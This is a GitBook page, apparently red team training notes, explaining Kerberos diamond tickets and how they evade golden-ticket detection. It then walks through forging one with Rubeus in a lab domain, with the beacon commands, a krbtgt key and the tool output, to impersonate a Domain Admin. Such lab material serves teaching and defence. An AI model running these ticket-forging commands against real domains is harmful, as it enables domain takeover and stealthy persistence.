> For the complete documentation index, see [llms.txt](https://yamortsa.gitbook.io/rto/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yamortsa.gitbook.io/rto/domain-dominance/diamond-tickets.md). # Diamond Tickets Like a golden ticket, a diamond ticket is a TGT which can be used to access any service as any user. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because domain controllers don't track TGTs it (or they) have legitimately issued, they will happily accept TGTs that are encrypted with its own krbtgt hash. Therefore, a possible tactic to detect the use of golden tickets is to look for TGS-REQs that have no corresponding AS-REQ. A "diamond ticket" is made by modifying the fields of a legitimate TGT that was issued by a DC. This is achieved by requesting a TGT, decrypting it with the domain's krbtgt hash, modifying the desired fields of the ticket, then re-encrypting it. This overcomes the aforementioned shortcoming of a golden ticket because any TGS-REQs will have a preceding AS-REQ. First, we prove we have no access to the DC. ``` beacon> getuid [*] You are DEV\bfarmer beacon> ls \\dc-2.dev.cyberbotic.io\c$ [-] could not open \\dc-2.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED ``` \\ Diamond tickets can be created with Rubeus. ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:nlamb /ticketuserid:1106 /groups:512 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap ``` \\ Where: * `/tgtdeleg` uses the Kerberos GSS-API to obtain a useable TGT for the current user without needing to know their password, NTLM/AES hash, or elevation on the host. * `/ticketuser` is the username of the user to impersonate. * `/ticketuserid` is the domain RID of that user. * `/groups` are the desired group RIDs (512 being Domain Admins). * `/krbkey` is the krbtgt AES256 hash. \\ ``` [*] Action: Diamond Ticket [*] No target SPN specified, attempting to build 'cifs/dc.domain.com' [*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc-2.dev.cyberbotic.io' [+] Kerberos GSS-API initialization success! [+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output. [*] Found the AP-REQ delegation ticket in the GSS-API output. [*] Authenticator etype: aes256_cts_hmac_sha1 [*] Extracted the service ticket session key from the ticket cache: +mzV4aOvQx3/dpZGBaVEhccq1t+jhKi8oeCYXkjHXw4= [+] Successfully decrypted the authenticator [*] base64(ticket.kirbi): doIFgz [...snip...] MuSU8= [*] Decrypting TGT [*] Retreiving PAC [*] Modifying PAC [*] Signing PAC [*] Encrypting Modified TGT [*] base64(ticket.kirbi): doIFYj [...snip...] MuSU8= ``` \\ Rubeus `describe` will now show that this is a TGT for the target user. ``` PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:doIFYj[...snip...]MuSU8= [*] Action: Describe Ticket ServiceName : krbtgt/DEV.CYBERBOTIC.IO ServiceRealm : DEV.CYBERBOTIC.IO UserName : nlamb UserRealm : DEV.CYBERBOTIC.IO StartTime : 7/7/2022 8:41:46 AM EndTime : 7/7/2022 6:41:46 PM RenewTill : 1/1/1970 12:00:00 AM Flags : name_canonicalize, pre_authent, forwarded, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : jp4k3G5LvXpIl3cuAnTtgLuxOWkPJIUjOEZB5wrHdVw= ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/domain-dominance/diamond-tickets.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.